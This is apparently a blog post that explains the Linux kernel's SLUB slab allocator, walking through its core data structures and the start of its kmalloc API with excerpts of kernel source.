<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">kmem_cache</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">kmem_cache_cpu</span> <span class="n">__percpu</span> <span class="o">*</span><span class="n">cpu_slab</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">slab_flags_t</span> <span class="n">flags</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">min_partial</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">size</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">object_size</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">reciprocal_value</span> <span class="n">reciprocal_size</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">offset</span><span class="p">;</span>	
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_SLUB_CPU_PARTIAL
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">cpu_partial</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">cpu_partial_slabs</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">kmem_cache_order_objects</span> <span class="n">oo</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="cm">/* Allocation and freeing of slabs */</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">kmem_cache_order_objects</span> <span class="n">min</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">gfp_t</span> <span class="n">allocflags</span><span class="p">;</span>	
</span></span><span class="line"><span class="cl">	<span class="kt">int</span> <span class="n">refcount</span><span class="p">;</span>		<span class="cm">/* Refcount for slab cache destroy */</span>
</span></span><span class="line"><span class="cl">	<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">ctor</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl">	<span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">;</span>	<span class="cm">/* Name (only for display!) */</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">list_head</span> <span class="n">list</span><span class="p">;</span>	<span class="cm">/* List of slab caches */</span>
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">kmem_cache_node</span> <span class="o">*</span><span class="n">node</span><span class="p">[</span><span class="n">MAX_NUMNODES</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p>comments stripped for redundancy, from <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L90">/include/linux/slub_def.h</a></p>
<p>As you might expect from the structure that underpins the SLUB allocator&rsquo;s cache implementation, there&rsquo;s a lot to unpack here! Let&rsquo;s break down the key bits.</p>
<p><code>name</code> stores the printable name for the cache, e.g. seen in the command <code>slabtop</code> (we&rsquo;ll cover introspection more later). Nothing wild here.</p>
<p><code>object_size</code> is the size, in bytes, of the objects (read: allocations) in this cache excluding metadata. Wheras <code>size</code> is the size, in bytes, including any metadata. Typically there is no additional metadata stored in SLUB objects, so these will be the same.</p>
<p><code>flags</code> holds the flags that can be set when creating a <code>kmem_cache</code> object. I won&rsquo;t go in to detail, but these can be used for debugging, error handling, alignment etc. <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L23">[2]</a></p>
<p><code>[struct kmem_cache_order_objects](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L83) oo</code> is a neat word-sized structure that simply contains one member: <code>unsigned int x</code>.</p>
<p>This is used to store both the order[3] of the slabs in this cache (in the upper bits) and the number of objects that they can contain (in the lower bits). There are then helpers to fetch either of these values (<code>[oo_objects()](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L419)</code> and <code>[oo_order()](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L414)</code>).</p>
<p><code>min</code> <em>I believe</em> stores the minimum <code>oo</code> counts for slabs without any debugging or extra metadata enabled. Such that when enabling those features, the kernel can compare if <code>oo</code> has increased from <code>min</code> and decided whether to still enable them if desired.</p>
<p><code>reciprocal_size</code> is, well, the reciprocal of <code>size</code>. If you also don&rsquo;t math, this is basically the properly calculated value of <code>1/size</code>. This is used by <code>[obj_to_index()](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L179)</code> for determining the index of an object within a slab.</p>
<p><code>list</code> is a linked list of all <code>struct kmem_cache</code> on the system and is exported as <code>[slab_caches](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L258)</code>.</p>
<p><img src="https://sam4k.com/content/images/2022/11/so_far_so_good.gif" alt=""></p>
<p>So far we&rsquo;ve covered some of the main metadata, but now we&rsquo;ll dive into some of the members involved in actually facilitating allocations.</p>
<p><code>cpu_slab</code> is a per CPU reference to a <code>[struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48)</code>. This means that under-the-hood this is an array of sorts and each CPU uses a different index<a href="https://lwn.net/Articles/452884/">[4]</a>, thus having a reference to a different <code>[struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48)</code>.</p>
<p>We&rsquo;ll touch more in this structure soon, but it represents the &ldquo;active&rdquo; slab for a given CPU. This means that any allocations made by a CPU will come from this slab (or at least this slab will be checked first!).</p>
<p><code>node[MAX_NUMNODES]</code> on the other hand is a per node reference to a <code>[struct kmem_cache_node](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741)</code>. This structure holds information on all the other slabs (partial, full etc.) within this node and is the next port of call after <code>cpu_slab</code>.</p>
<p><code>min_partial</code> defines the minimum number of slabs in a partial list, even if they&rsquo;re empty. Typically when a slab is empty, it will be freed back to the buddy allocator, unless there is <code>min_partial</code> or less slabs in the partial list!</p>
<p><code>offset</code> stores the &ldquo;free pointer offset&rdquo;. My educated guess is that this is the byte offset into an object where the free pointer (i.e. pointer to next free object in the slab) is found. This would usually be zero and probably changes with debugging/flag tweaks.</p>
<p><code>[CONFIG_SLUB_CPU_PARTIAL](https://cateee.net/lkddb/web-lkddb/SLUB_CPU_PARTIAL.html)</code> enables <code>[struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48)</code> to not just track a per CPU &ldquo;active&rdquo; slab but also have its own per CPU partial list. After explaining the roles of <code>cpu_slab</code> and <code>node[]</code> the benefits should become clearer.</p>
<p><code>cpu_partial</code> and <code>cpu_partial_slabs</code> define the number of partial objects and partial slabs to keep around.</p>
<p><code>allocflags</code> allows a cache to define GFP flags<a href="https://www.kernel.org/doc/html/latest/core-api/memory-allocation.html">[5]</a> to apply to allocations, which can determine allocator behaviour. These can also be added through the allocation API.</p>
<p><code>ctor()</code> lets the cache define a constructor to be called on the object during <code>[setup_object()](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L1806)</code> which is called when a new slab is allocated.</p>
<p><img src="https://sam4k.com/content/images/2022/11/yes_its_over_now.gif" alt=""></p>
<p>And that&rsquo;s more or less all the key fields in <code>kmem_cache</code>! Hopefully that provided some additional context around the main structure underpinning the cache implementation, and we can dive into the next two with enough context to get along.</p>
<p>There&rsquo;s of course some fields I missed out, associated with debugging, mitigations or other bits and pieces that probably didn&rsquo;t justify the bloat but I may come back to some time.</p>
<h4 id="struct-kmemcachecpu">struct kmem_cache_cpu</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">kmem_cache_cpu</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="kt">void</span> <span class="o">**</span><span class="n">freelist</span><span class="p">;</span>	<span class="cm">/* Pointer to next available object */</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">tid</span><span class="p">;</span>	<span class="cm">/* Globally unique transaction id */</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">slab</span> <span class="o">*</span><span class="n">slab</span><span class="p">;</span>	<span class="cm">/* The slab from which we are allocating */</span>
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_SLUB_CPU_PARTIAL
</span></span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">slab</span> <span class="o">*</span><span class="n">partial</span><span class="p">;</span>	<span class="cm">/* Partially allocated frozen slabs */</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl">	<span class="kt">local_lock_t</span> <span class="n">lock</span><span class="p">;</span>	<span class="cm">/* Protects the fields above */</span>
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_SLUB_STATS
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="n">stat</span><span class="p">[</span><span class="n">NR_SLUB_STAT_ITEMS</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p> <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48">/include/linux/slub_def.h</a></p>
<p>Bet you&rsquo;re breathing a sigh of relief at that 12 liner, eh? I know I am writing this lol. Anyway, let&rsquo;s dive into <code>[struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48)</code>, which tracks an active slab (and partial list) for a specific CPU.</p>
<p><code>freelist</code> points to the next available (free) object in the active slab, <code>slab</code>. This is a <code>void **</code> as each free object contains a pointer to the next free object in the slab.</p>
<p><code>slab</code> points to the <code>[struct slab](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9)</code> representing the &ldquo;active&rdquo; slab, i.e. the slab from which we&rsquo;re allocating from for this CPU. We&rsquo;ll explore this more soon.</p>
<p><code>partial</code> is the per cpu partial list we mentioned earlier, when <code>[CONFIG_SLUB_CPU_PARTIAL](https://cateee.net/lkddb/web-lkddb/SLUB_CPU_PARTIAL.html)</code> is enabled (it should be on server/desktop). This points to a list of partially full <code>[struct slab](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9)</code>.</p>
<p><img src="https://sam4k.com/content/images/2022/11/hard_time_visualising.gif" alt=""></p>
<p>u and me both</p>
<p>Okay so let&rsquo;s move away from dry member descriptions and actually look at some examples of how SLUB might serve an allocation request!</p>
<p>In this example lets say a kernel driver has requested to allocate a 512 byte object via the SLUB allocator API (spoiler: it&rsquo;s <code>kmalloc()</code>), from the general purpose cache for 512 byte objects, <code>kmalloc-512</code>. There&rsquo;s a couple of ways this can do down!</p>
<p>If <code>cache-&gt;cpu_slab-&gt;slab</code> has several free objects, things are fairly simple. The address of the object pointed to by <code>cache-&gt;cpu_slab-&gt;freelist</code> will be returned to the caller.</p>
<p>The <code>freelist</code> will be updated to point to the next free object in <code>cache-&gt;cpu_slab-&gt;slab</code> and relevant metadata will be updated regarding this allocation.</p>
<p><img src="https://sam4k.com/content/images/2022/11/alloc_case1-2.gif" alt=""></p>
<p>the addr of <code>new obj</code> is returned to the caller</p>
<p>Before we dive into other allocation scenarios, let&rsquo;s cover one more structure (sorry)!</p>
<h4 id="struct-kmemcachenode">struct kmem_cache_node</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">kmem_cache_node</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="kt">spinlock_t</span> <span class="n">list_lock</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">nr_partial</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">list_head</span> <span class="n">partial</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_SLUB_DEBUG
</span></span></span><span class="line"><span class="cl">	<span class="kt">atomic_long_t</span> <span class="n">nr_slabs</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">atomic_long_t</span> <span class="n">total_objects</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">list_head</span> <span class="n">full</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741">/mm/slab.h</a></p>
<p>We&rsquo;re almost their folks! This structure tracks the partially full (<code>partial</code>) and full slabs for a particular node. We&rsquo;re talking about NUMA nodes here, which we <em>very briefly</em> touched on in the last post.</p>
<p>The tl;dr here is many CPUs can belong to one node. You can see your node information on Linux with the command <code>numactl -H</code>, which will let you know how many nodes you have and the CPUs that belong to each node!</p>
<p><code>partial</code> is a linked list of partially full <code>struct slabs</code>. The number of which is tracked by <code>nr_partial</code>, which should always be greater or equal than <code>kmem_cache-&gt;min_partial</code>, as we touched on earlier.</p>
<p><code>full</code> is a linked list of full <code>struct slabs</code>. Not much else to say about that!</p>
<p><code>nr_slabs</code> is the total number of slabs tracked by this <code>kmem_cache_node</code>. Similarly, <code>total_objects</code> tracks the total number of allocated objects.</p>
<p><img src="https://sam4k.com/content/images/2022/11/let_me_show_you.gif" alt=""></p>
<p>So now we have more context about the internal SLUB structures, let&rsquo;s take what we know and apply that to a different allocation path, using the scenario from before.</p>
<p>If the <code>new obj</code> returned to the caller is the last free object in <code>cache-&gt;cpu_slab-&gt;slab</code>, the &ldquo;active&rdquo; <code>slab</code> is moved into it&rsquo;s node&rsquo;s <code>full</code> list. The first slab from <code>cache-&gt;cpu_slab-&gt;partial</code> is then made the &ldquo;active&rdquo; <code>slab</code>.  </p>
<p><img src="https://sam4k.com/content/images/2022/11/alloc_case2.gif" alt=""></p>
<p>As you can imagine, there&rsquo;s many potential allocation paths depending on the internal cache state. Similarly, there are multiple paths when an object is freed.</p>
<p>I won&rsquo;t walk through all the possible cases here, but hopefully this post provides enough details to fill in the blanks!</p>
<h4 id="struct-slab">struct slab</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">slab</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">__page_flags</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">union</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">struct</span> <span class="n">list_head</span> <span class="n">slab_list</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">struct</span> <span class="n">rcu_head</span> <span class="n">rcu_head</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_SLUB_CPU_PARTIAL
</span></span></span><span class="line"><span class="cl">		<span class="k">struct</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="k">struct</span> <span class="n">slab</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">			<span class="kt">int</span> <span class="n">slabs</span><span class="p">;</span>	<span class="cm">/* Nr of slabs left */</span>
</span></span><span class="line"><span class="cl">		<span class="p">};</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl">	<span class="p">};</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="n">slab_cache</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="cm">/* Double-word boundary */</span>
</span></span><span class="line"><span class="cl">	<span class="kt">void</span> <span class="o">*</span><span class="n">freelist</span><span class="p">;</span>		<span class="cm">/* first free object */</span>
</span></span><span class="line"><span class="cl">	<span class="k">union</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">counters</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">struct</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="nl">inuse</span><span class="p">:</span><span class="mi">16</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="nl">objects</span><span class="p">:</span><span class="mi">15</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="nl">frozen</span><span class="p">:</span><span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="p">};</span>
</span></span><span class="line"><span class="cl">	<span class="p">};</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">__unused</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="kt">atomic_t</span> <span class="n">__page_refcount</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_MEMCG
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">memcg_data</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9">/mm/slab.h</a></p>
<p>Last, but certainly not least, on our SLUB struct tour is <code>struct slab</code>. This structure, unsurprisingly, represents a slab. Seems pretty straightforward, right?</p>
<p>Well, despite it&rsquo;s benign look, <code>struct slab</code> is hiding something. It&rsquo;s actually a <code>struct page</code> in disguise. Wait, what?</p>
<p>Until recently (5.17)<a href="https://lwn.net/Articles/881039/">[6]</a>,  a slab&rsquo;s metadata was accessed directly via a union in the <code>struct page</code> which represented the slabs memory[7].</p>
<p>While that slab information <em>is still stored in</em> <code>struct page</code>, as an effort to decouple things from <code>struct page</code>, <code>struct slab</code> was created to move away from using <code>struct page</code> with the aim to move the information out of <code>struct page</code> entirely in the future.</p>
<p><img src="https://sam4k.com/content/images/2022/11/stay_focused.gif" alt=""></p>
<p>Anyway, with that little bit of excitement out the way, let&rsquo;s see what some of these fields within <code>struct page</code>, uh I mean <code>struct slab</code> are saying!</p>
<p>The first <code>union</code> can contain several things: <code>slab_list</code>, the linked list this <code>slab</code> belongs in, e.g. the node&rsquo;s <code>full</code> list; a struct for CPU partial slabs where <code>next</code> is the next CPU partial slab and <code>slabs</code> is the number of slabs left in the CPU partial list.</p>
<p><code>slab_cache</code> is a reference to the <code>struct kmem_cache</code> this slab belongs to.</p>
<p><code>freelist</code> is a pointer to the first free object in this slab.</p>
<p>Then we have another <code>union</code>, this time used to view the same data in different ways. <code>counters</code> is used to fetch the counters within the struct easily, whereas the struct allows granular access to each of the counters: <code>inuse</code>, <code>objects</code>, <code>frozen</code>.</p>
<p><code>objects</code> is a 15-bit counter defining the total number of objects in the slab, while <code>inuse</code> is a 16-bit counter use to track the number of objects in the slab being used (i.e. have been allocated and not freed).</p>
<p><code>frozen</code> is a boolean flag that tells SLUB whether the slab has been frozen or not. Frozen slabs are &ldquo;exempt from list management. It is not on any list except per cpu partial list. The processor that froze the slab is the one who can perform list operations on the slab&rdquo;.<a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L74">[8]</a></p>
<p><code>CONFIG_MEMCG</code> &ldquo;provides control over the memory footprint of tasks in a cgroup&rdquo;<a href="https://cateee.net/lkddb/web-lkddb/MEMCG.html">[9]</a>. Part of this includes accounting kernel memory for memory cgroups (memcgs)<a href="https://www.kernel.org/doc/Documentation/cgroup-v1/memory.txt">[10]</a>. Allocations made with the GFP flag <code>GFP_KERNEL_ACCOUNT</code> are accounted.</p>
<p><code>memcg_data</code> is used when accounting is enabled to store &ldquo;the object cgroups vector associated with a slab&rdquo;<a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L433">[11]</a>.</p>
<h4 id="wrap-up">Wrap-up</h4>
<p><img src="https://sam4k.com/content/images/2022/11/respct.gif" alt=""></p>
<p>Whew, that was quite the knowledge dump! If you read through that start-to-finish then kudos to you cos that&rsquo;s a lot to take in; hopefully it&rsquo;s not <em>too</em> dry.</p>
<p>The aim of this section was to provide a decent foundational understanding of the SLUB allocator as seen in modern Linux kernels by exploring the core data structures used in it&rsquo;s implementation and exploring how they fit together.</p>
<p>Next up we&rsquo;ll use this to take a look at the API and how the SLUB allocator can be used by other parts of the kernel. A bit later we&rsquo;ll also touch on some introspection, if you want to get some hands on and explore some of these data structures and stuff.</p>
<hr>
<ol>
<li><a href="https://lwn.net/Articles/881039/">https://lwn.net/Articles/881039/</a></li>
<li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L23">https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L23</a></li>
<li>Remember page order sizes from the previous section? A 0x1000 byte slab is an order 0 slab (20 pages).</li>
<li><a href="https://lwn.net/Articles/452884/">https://lwn.net/Articles/452884/</a></li>
<li><a href="https://www.kernel.org/doc/html/latest/core-api/memory-allocation.html">https://www.kernel.org/doc/html/latest/core-api/memory-allocation.html</a></li>
<li><a href="https://lwn.net/Articles/881039/">https://lwn.net/Articles/881039/</a></li>
<li>we&rsquo;ll remember from previous posts that there is a <code>struct page</code> for every physical page of memory that the kernel manages</li>
<li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L74">https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L74</a></li>
<li><a href="https://cateee.net/lkddb/web-lkddb/MEMCG.html">https://cateee.net/lkddb/web-lkddb/MEMCG.html</a></li>
<li><a href="https://www.kernel.org/doc/Documentation/cgroup-v1/memory.txt">https://www.kernel.org/doc/Documentation/cgroup-v1/memory.txt</a></li>
<li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L433">https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L433</a></li>
</ol>
<h3 id="the-api">The API</h3>
<p><img src="https://sam4k.com/content/images/2022/11/here_we_go-again.gif" alt=""></p>
<p>Thought you were done with kernel code? Hah! Think again. Time to take our understanding of the kernel&rsquo;s SLUB allocator and explore it&rsquo;s API.</p>
<p>Like all my posts, this is pretty adhoc, so if I get excited we might take a deeper look into some of the allocator functions and have a peek at the implementation.</p>
<p>It&rsquo;s worth highlighting again that <strong>there are three slab allocator implementations</strong> in the Linux kernel: <strong>SLAB</strong>, <strong>SLUB</strong> &amp; <strong>SLOB</strong>. They share the same API, so as to abstract the implementation from the rest of the kernel.</p>
<p>As you might expect, be prepared for plenty of <code>#ifdef</code>s when perusing the source! The starting point for which is probably going to be <code>[include/linux/slab.h](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h)</code>.</p>
<h4 id="kmalloc-kfree">kmalloc &amp; kfree</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="o">*</span><span class="nf">kmalloc</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">size</span><span class="p">,</span> <span class="kt">gfp_t</span> <span class="n">flags</span><span class="p">)</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L586">/include/linux/slab.h</a></p>
<p>The bread and butter of the slab allocator API, <code>kmalloc()</code>, as the name implies, is essentially the kernel equivalent of C&rsquo;s <code>malloc()</code>.</p>
<p>It allows a kernel developer to request a memory allocation of <code>size</code> bytes, on a success the function will return a pointer to the allocated memory and error code<a href="https://man7.org/linux/man-pages/man3/errno.3.html">[1]</a> on a failure.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">static</span> <span class="n">__always_inline</span> <span class="nf">__alloc_size</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">kmalloc</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">size</span><span class="p">,</span> <span class="kt">gfp_t</span> <span class="n">flags</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="nf">__builtin_constant_p</span><span class="p">(</span><span class="n">size</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="n">size</span> <span class="o">&gt;</span> <span class="n">KMALLOC_MAX_CACHE_SIZE</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="nf">kmalloc_large</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="nf">__kmalloc</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><todo>
<p>We can see the generic <code>kmalloc()</code> definition is a wrapper around <code>__kmalloc()</code> which is prototyped in <code>slab.h</code>, but the definition is slab implementation specific.</p>
<p>The <code>kmalloc()</code> wrapper essentially hands off large allocations (defined by <code>[KMALLOC_MAX_CACHE_SIZE](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L290)</code>) to a separate function: <code>[kmalloc_large()](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L526)</code> which in fact calls the underlying buddy allocator to serve large allocations!</p>
<p>Otherwise, <code>[__kmalloc()](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L434)</code> is called, who&rsquo;s implementation can be found in <code>[/mm/slub.c](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L4412)</code>.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="o">*</span><span class="nf">__kmalloc</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">size</span><span class="p">,</span> <span class="kt">gfp_t</span> <span class="n">flags</span><span class="p">)</span> <span class="p">{</span> 
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="n">s</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">void</span> <span class="o">*</span><span class="n">ret</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl">	<span class="n">s</span> <span class="o">=</span> <span class="nf">kmalloc_slab</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>         <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><todo>
<p>Bringing things back round to the SLUB allocator, if this is making an allocation of <code>size</code> bytes - what <code>kmem_cache</code> is it allocating from? Good question!</p>
<p>By default the kernel creates an array of general purpose <code>kmem_caches</code> depending on the &ldquo;kmalloc type&rdquo; (derived from <code>flags</code>) and the allocation <code>size</code>.</p>
<p>These caches are mainly created via <code>[create_kmalloc_caches()](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab_common.c#L875)</code> and stored in the exported symbol <code>[kmalloc_caches](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L339)</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">extern</span> <span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span>
</span></span><span class="line"><span class="cl"><span class="n">kmalloc_caches</span><span class="p">[</span><span class="n">NR_KMALLOC_TYPES</span><span class="p">][</span><span class="n">KMALLOC_SHIFT_HIGH</span> <span class="o">+</span> <span class="mi">1</span><span class="p">];</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L339">/include/linux/slab.h</a></p>
<p>So to answer our question: <code>kmalloc()</code> will determine which <code>kmem_cache</code> to allocate from by using the <code>flags</code> and <code>sizes</code> arguments to index into <code>kmalloc_caches</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">kmalloc_caches</span><span class="p">[</span><span class="nf">kmalloc_type</span><span class="p">(</span><span class="n">flags</span><span class="p">)][</span><span class="n">index</span><span class="p">];</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab_common.c#L737">/mm/slab_common.c</a></p>
<p>The <code>index</code> is above is derived from <code>size</code>. The general purpose cache size-to-index can be seen via the <code>[__kmalloc_index()](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L386)</code> definition.</p>
